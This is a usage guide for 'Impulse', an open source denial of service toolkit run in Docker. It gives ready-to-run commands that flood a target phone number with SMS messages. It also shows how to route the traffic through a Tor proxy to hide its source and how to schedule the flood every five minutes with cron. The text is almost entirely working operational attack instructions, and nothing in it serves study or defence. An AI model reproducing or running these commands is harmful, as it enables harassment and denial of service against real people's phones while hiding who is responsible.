Content
Impulse – Open source denial of service toolkit.
π Install
Here are some example snippets to help you get started creating a container.
Docker
1) docker run -dit \
--name=Impulse -e TZ=Europe/Moscow --restart=always \
smied/impulse:latest
or
1) docker run -dit --name=Impulse -e TZ=Europe/Moscow --restart=always smied/impulse:latest
Usage
2) run in terminal: docker exec Impulse python3 ./impulse.py --help
Other
Example
run in terminal: docker exec Impulse python3 ./impulse.py --method SMS --time 20 --threads 15 --target +380123456789
Go inside the container
run in terminal: docker exec -it Impulse sh
Working through Tor as a proxy
- Launch Tor proxy
docker run -d \
--name=Tor-proxy -e TZ=Europe/Moscow --restart=always \
-p 8118:8118 \
-p 9050:9050 \
-e LOCATION=UA \
dperson/torproxy
- Start Impulse with Tor proxy
docker run -dit \
--name=Impulse -e TZ=Europe/Moscow --restart=always \
--env HTTP_PROXY="https://<YourIP>:8118" \
smied/impulse:latest
Cron
- Edit
crontab -e
- Add
*/5 * * * * sudo -u root docker exec Impulse python3 ./impulse.py --method SMS --time 20 --threads 15 --target +380123456789 > /dev/null 2>&1
or
*/5 * * * * sudo -u root docker exec Impulse python3 ./impulse.py --method SMS --time 20 --threads 15 --target +380123456789 >> /Docker/Impulse.log
See logs
cat /Docker/Impulse.log
If you have found a spelling error, please, notify us by selecting that text and pressing Ctrl+Enter.
Spelling error report
The following text will be sent to our editors: